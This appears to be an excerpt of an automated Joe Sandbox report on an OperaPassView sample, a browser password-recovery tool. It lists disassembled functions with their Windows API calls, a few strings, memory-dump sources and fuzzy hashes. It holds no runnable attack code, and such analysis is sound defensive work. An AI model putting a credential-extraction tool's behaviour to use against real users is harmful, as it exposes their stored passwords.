                                        Function 004037B3 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004037C3
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004037DF
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00403805
                                        • memset.MSVCRT ref: 00403815
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00403844
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00403891
                                        • SetFocus.USER32(?,?,?,?), ref: 0040389A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004038AA
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: 03ce0126af2e166a49035f109e5b9b371e627cad62393e3c1ce19d5379043738
                                        • Instruction ID: a94385e8c78de924cee77f368874fbad43a9d8de2ae7ea267fe0a8e67a2869b7
                                        • Opcode Fuzzy Hash: 03ce0126af2e166a49035f109e5b9b371e627cad62393e3c1ce19d5379043738
                                        • Instruction Fuzzy Hash: 1331A4B2900605AFDB14AF29C88591AFBE8FF44354B00CA3FF519E7691D778ED408B98
                                        Function 004079CE Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004079ED
                                        • GetWindowRect.USER32(?,?), ref: 00407A03
                                        • GetWindowRect.USER32(?,?), ref: 00407A16
                                        • BeginDeferWindowPos.USER32(00000003), ref: 00407A33
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 00407A50
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 00407A70
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 00407A97
                                        • EndDeferWindowPos.USER32(?), ref: 00407AA0
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: dae75a277170d538d4aadf7f93f54a33f7291817a4ebdf1889a4639404ac1ddf
                                        • Instruction ID: e4f78f3829a74d2a8d6fc1eee99c52144a6f2d081558712967551c55d100aa1b
                                        • Opcode Fuzzy Hash: dae75a277170d538d4aadf7f93f54a33f7291817a4ebdf1889a4639404ac1ddf
                                        • Instruction Fuzzy Hash: 2921A472A40209FFEB119FA8CE89FEEBBB9FB48300F104164FA55B6161C73169559F24
                                        Function 0040B211 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 0040B292
                                        • _wcsicmp.MSVCRT ref: 0040B2A7
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AA3
                                          • Part of subcall function 00403A94: wcslen.MSVCRT ref: 00403AAD
                                          • Part of subcall function 00403A94: _memicmp.MSVCRT ref: 00403AC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcslen$_memicmp
                                        • String ID: .save$http://$https://$log profile$signIn
                                        • API String ID: 1428608950-2708368587
                                        • Opcode ID: 802a3b1c96b8a1692ab2faeed1ea34f8d6feca5b72e74921201663452091f673
                                        • Instruction ID: aebae70456654339f84af78ccd11eee7a693882df7f645b401ad4cefe5663bbc
                                        • Opcode Fuzzy Hash: 802a3b1c96b8a1692ab2faeed1ea34f8d6feca5b72e74921201663452091f673
                                        • Instruction Fuzzy Hash: 63413A71500305CADB349A69C4097ABB7E8DB04319F30887FE866F36C1DB7CA9419A9D
                                        Function 004033F1 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00403408
                                        • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00403421
                                        • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 0040342E
                                        • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0040343A
                                        • memset.MSVCRT ref: 0040349E
                                        • SendMessageW.USER32(?,0000105F,?,?), ref: 004034D3
                                        • SetFocus.USER32(?), ref: 00403559
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: fc0645fcad6935a50dda920a1aace060dab3b66a03edc3faef74037774e53fb0
                                        • Instruction ID: 20cdf0d6c318418226ee98135bf92e64c1e6f3741e613206d3032fbef3e3ddd3
                                        • Opcode Fuzzy Hash: fc0645fcad6935a50dda920a1aace060dab3b66a03edc3faef74037774e53fb0
                                        • Instruction Fuzzy Hash: 0F414971D00219BBDB209F95CC89DAFBF79EF08755F00806AF908B6291D7749A80CFA4
                                        Function 00405202 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 00405229
                                          • Part of subcall function 00405052: GetMenuItemCount.USER32(?), ref: 00405068
                                          • Part of subcall function 00405052: memset.MSVCRT ref: 00405087
                                          • Part of subcall function 00405052: GetMenuItemInfoW.USER32 ref: 004050C3
                                          • Part of subcall function 00405052: wcschr.MSVCRT ref: 004050DB
                                        • DestroyMenu.USER32(00000000), ref: 00405247
                                        • CreateDialogParamW.USER32(?,?,00000000,004051FD,00000000), ref: 00405295
                                        • memset.MSVCRT ref: 004052B1
                                        • GetWindowTextW.USER32(00000000,?,00001000), ref: 004052C6
                                          • Part of subcall function 00404E81: _snwprintf.MSVCRT ref: 00404EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountCreateDestroyDialogInfoLoadParamTextWindow_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 4269739968-4135340389
                                        • Opcode ID: 149c361682219c7e34215e06fcc554497841175788682e13768cb0a330dcec1d
                                        • Instruction ID: 9453a059592ad42c78b6b37bd85bce73a5cacd14e9a23cb9a166f4fbe1604a1c
                                        • Opcode Fuzzy Hash: 149c361682219c7e34215e06fcc554497841175788682e13768cb0a330dcec1d
                                        • Instruction Fuzzy Hash: 8021E272900214ABDB21AF50EC89EAF3B68FF05760F0044BEF905B50E1D7788991DF99
                                        Function 00405052 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                        • String ID: 0$6
                                        • API String ID: 2029023288-3849865405
                                        • Opcode ID: 5f83e7dfff2683fd3da09f41f906c5c49763c21eea20386180a339c445556ac6
                                        • Instruction ID: 538c7a170678a2969158565ed220208d763336d8b4b0833da97998c4ee0265a7
                                        • Opcode Fuzzy Hash: 5f83e7dfff2683fd3da09f41f906c5c49763c21eea20386180a339c445556ac6
                                        • Instruction Fuzzy Hash: 4721DE32914304ABC7209F51D845A9FB7A8FF88754F000A3FF684A6281E77A9940CBDE
                                        Function 00407803 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00407384: SendMessageW.USER32(?,0000000B,?,00000000), ref: 00407392
                                          • Part of subcall function 004038B4: LoadCursorW.USER32(00000000,00007F02), ref: 004038BB
                                          • Part of subcall function 004038B4: SetCursor.USER32(00000000), ref: 004038C2
                                        • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00407840
                                          • Part of subcall function 00407769: _snwprintf.MSVCRT ref: 00407796
                                          • Part of subcall function 00407769: _snwprintf.MSVCRT ref: 004077C1
                                          • Part of subcall function 00407769: wcscat.MSVCRT ref: 004077D4
                                          • Part of subcall function 00407769: SendMessageW.USER32(?,0000040B,00000000,?), ref: 004077FB
                                          • Part of subcall function 004038CE: SetCursor.USER32(00406EB4), ref: 004038D4
                                          • Part of subcall function 004058AB: SetFocus.USER32(?,00407873), ref: 004058B1
                                        • memset.MSVCRT ref: 004078A2
                                        • _snwprintf.MSVCRT ref: 004078BE
                                        • SetWindowTextW.USER32(?,OperaPassView), ref: 004078DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: CursorMessageSend_snwprintf$FocusLoadTextWindowmemsetwcscat
                                        • String ID: %s - %s$OperaPassView
                                        • API String ID: 2853318093-1794996424
                                        • Opcode ID: 89465e328d0f591701b4b77d1b23a1bdeb4b2612a6e07a3e464c47ad0c26e3b1
                                        • Instruction ID: b1892371dd2e9f65290bc5ed040e2386b43b7ae8db8c37b5a9f578916e593a1d
                                        • Opcode Fuzzy Hash: 89465e328d0f591701b4b77d1b23a1bdeb4b2612a6e07a3e464c47ad0c26e3b1
                                        • Instruction Fuzzy Hash: 30216F31900205AFE310FB65CC85F96B7EDEF44308F0044B9B559A75D1CB7978558B55
                                        Function 00404106 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$_snwprintfmemset
                                        • String ID: %2.2X
                                        • API String ID: 2521778956-791839006
                                        • Opcode ID: b1f95c932e24bcdfe99f188a17c3828b4f660331acecbfbb3d7642938c25ebb1
                                        • Instruction ID: daaebc757af128cb663d588b12b0cbc29fe2586e7ab738a320fc69d6085252d8
                                        • Opcode Fuzzy Hash: b1f95c932e24bcdfe99f188a17c3828b4f660331acecbfbb3d7642938c25ebb1
                                        • Instruction Fuzzy Hash: FB01F5B2E0431866E720A6519C4BBBA33ACEB80B14F10007FFD14B90C2EB7D994846CD
                                        Function 004031B3 Relevance: 10.5, APIs: 7, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 004031CA
                                        • GetWindow.USER32(?,00000005), ref: 004031E2
                                        • GetWindow.USER32(00000000), ref: 004031E5
                                          • Part of subcall function 00401584: GetWindowRect.USER32(?,?), ref: 00401593
                                          • Part of subcall function 00401584: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015AE
                                        • GetWindow.USER32(00000000,00000002), ref: 004031F1
                                        • GetDlgItem.USER32(?,000003EE), ref: 00403208
                                        • GetDlgItem.USER32(?,000003EE), ref: 00403216
                                        • SetFocus.USER32(00000000), ref: 00403219
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Window$ItemRect$ClientFocusPoints
                                        • String ID:
                                        • API String ID: 2702700334-0
                                        • Opcode ID: a85f5d6972250b487f189912b8203cb154522be3c771e050ceb9a77a4a5c8d1d
                                        • Instruction ID: 4c80671100bc7487ec600a80e72f158d44a53e1a999341b5ac59c428e69ca6c6
                                        • Opcode Fuzzy Hash: a85f5d6972250b487f189912b8203cb154522be3c771e050ceb9a77a4a5c8d1d
                                        • Instruction Fuzzy Hash: 5001DB31500308FBDB105B75DC89FAB7BADDBC9765F10052AF904BB250DB74ED018AA4
                                        Function 0040AFB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcscpy.MSVCRT ref: 0040AFCC
                                        • wcscat.MSVCRT ref: 0040AFDB
                                        • wcscat.MSVCRT ref: 0040AFEC
                                        • wcscat.MSVCRT ref: 0040AFFB
                                        • 74D41560.VERSION(?,?,00000000,?), ref: 0040B015
                                          • Part of subcall function 00403BFD: wcslen.MSVCRT ref: 00403C04
                                          • Part of subcall function 00403BFD: memcpy.MSVCRT(?,?,000000FF,?,0040B032,00000000,?,?,?,00000000,?), ref: 00403C1A
                                          • Part of subcall function 00403C7C: lstrcpyW.KERNEL32(?,?,0040B03A,?,?,?,00000000,?), ref: 00403C91
                                          • Part of subcall function 00403C7C: lstrlenW.KERNEL32(?), ref: 00403C98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscat$D41560lstrcpylstrlenmemcpywcscpywcslen
                                        • String ID: \StringFileInfo\
                                        • API String ID: 1466122427-2245444037
                                        • Opcode ID: 324682729d8186604e729f484209650df35c4949d97cda78b875cec455760db2
                                        • Instruction ID: f8ce8c5ff0c9cfaa06592da41163ef34e863ac78dd4625ffd6bbac5636820e08
                                        • Opcode Fuzzy Hash: 324682729d8186604e729f484209650df35c4949d97cda78b875cec455760db2
                                        • Instruction Fuzzy Hash: B2015E7290020CAACB10EAA1CC46EDF776CDB04304F000576B564F2092EF39DA8A9B9D
                                        Function 00404E81 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: _snwprintfwcscpy
                                        • String ID: dialog_%d$general$menu_%d$strings
                                        • API String ID: 999028693-502967061
                                        • Opcode ID: 0933e8eb2af049f5224fd0a0279fc28b9d9fee4c80c44f955a7bbbc898aac174
                                        • Instruction ID: d7c126390a0a95e70c8d303e7ee891c4f76a78e8e38c5110ed71e63c4d85d429
                                        • Opcode Fuzzy Hash: 0933e8eb2af049f5224fd0a0279fc28b9d9fee4c80c44f955a7bbbc898aac174
                                        • Instruction Fuzzy Hash: 78E0E6B1FC830075DD5011D59C53B1B2541ABD5B24F704877F746B05D1E6BDA89425CF
                                        Function 0040B400 Relevance: 10.2, APIs: 8, Instructions: 186COMMON
                                        Download Yara Rule
                                        APIs
                                        • memchr.MSVCRT ref: 0040B43F
                                        • memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B4E7
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0040B4F7
                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 0040B51D
                                        • memcpy.MSVCRT(?,0040C790,0000000B), ref: 0040B52D
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 0040B53D
                                        • memcpy.MSVCRT(?,?,00000008,?,?), ref: 0040B593
                                        • memset.MSVCRT ref: 0040B5E5
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpy$memchrmemset
                                        • String ID:
                                        • API String ID: 1581201632-0
                                        • Opcode ID: f60f60e2365ed897c929b8c74f0fd997f1cd53ae9cc400f4c443353e134ed1ba
                                        • Instruction ID: 01e1e0abaa7c517d468a3621524a070298f9ba8d4cbfca9af77019fa2c654f59
                                        • Opcode Fuzzy Hash: f60f60e2365ed897c929b8c74f0fd997f1cd53ae9cc400f4c443353e134ed1ba
                                        • Instruction Fuzzy Hash: BB51B3725143455BC710DE69C881EABB7E8EB84304F040D3FF995D7282E739EA09C7AA
                                        Function 00409D65 Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00409A15,00000000,00000000), ref: 00409DA0
                                        • memset.MSVCRT ref: 00409E02
                                        • memset.MSVCRT ref: 00409E12
                                          • Part of subcall function 00409C7F: wcscpy.MSVCRT ref: 00409CA8
                                        • memset.MSVCRT ref: 00409EFD
                                        • wcscpy.MSVCRT ref: 00409F1E
                                        • CloseHandle.KERNEL32(?,00409A15,?,?,?,00409A15,00000000,00000000), ref: 00409F74
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3300951397-0
                                        • Opcode ID: db29b1a15ab221589b072cade464e9f57ecbfdb672e9c3838357f40fba68a12d
                                        • Instruction ID: ed0b31324ba2f07f6e5e15296f4eb4d60d58a6fc9675b4e9f40aac7df0c1affd
                                        • Opcode Fuzzy Hash: db29b1a15ab221589b072cade464e9f57ecbfdb672e9c3838357f40fba68a12d
                                        • Instruction Fuzzy Hash: 0A516D71108345AFD720DF25C884A9FBBE8FF84304F004A2EF589E2291DB75D944CBAA
                                        Function 00407E81 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00407EA3
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,00000400,?,004020A6,OperaPassView), ref: 00404A1E
                                          • Part of subcall function 004049DF: LoadStringW.USER32(00000000,00000006,?,00000400), ref: 00404AB7
                                          • Part of subcall function 004049DF: memcpy.MSVCRT(00000000,00000002,?,004020A6,OperaPassView), ref: 00404AF7
                                          • Part of subcall function 004049DF: wcscpy.MSVCRT ref: 00404A60
                                          • Part of subcall function 004049DF: wcslen.MSVCRT ref: 00404A7E
                                          • Part of subcall function 004049DF: GetModuleHandleW.KERNEL32(00000000,?,?,004020A6,OperaPassView), ref: 00404A8C
                                          • Part of subcall function 004043C3: memset.MSVCRT ref: 004043E4
                                          • Part of subcall function 004043C3: _snwprintf.MSVCRT ref: 00404417
                                          • Part of subcall function 004043C3: wcslen.MSVCRT ref: 00404423
                                          • Part of subcall function 004043C3: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040443B
                                          • Part of subcall function 004043C3: wcslen.MSVCRT ref: 00404449
                                          • Part of subcall function 004043C3: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),0040D934,?,?,?,00000000), ref: 0040445C
                                          • Part of subcall function 00404208: wcscpy.MSVCRT ref: 0040426E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 2618321458-3614832568
                                        • Opcode ID: fa6aac4af9a437cf9dfdff43ae2e0e7df4d45df21183e3b5f77e80c00bc9b2de
                                        • Instruction ID: 7557137d6e321005020f6f1fadc05ab8639f5b3343127878cbcf5c5923e4d1d4
                                        • Opcode Fuzzy Hash: fa6aac4af9a437cf9dfdff43ae2e0e7df4d45df21183e3b5f77e80c00bc9b2de
                                        • Instruction Fuzzy Hash: F73130F1D0021D9FDB40EFA5D882ADE7BB4FB44318F10417BE649BB281DB385A558B98
                                        Function 00401668 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 00401677
                                        • GetSystemMetrics.USER32(00000015), ref: 00401685
                                        • GetSystemMetrics.USER32(00000014), ref: 00401691
                                        • BeginPaint.USER32(?,?), ref: 004016AB
                                        • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016BA
                                        • EndPaint.USER32(?,?), ref: 004016C7
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
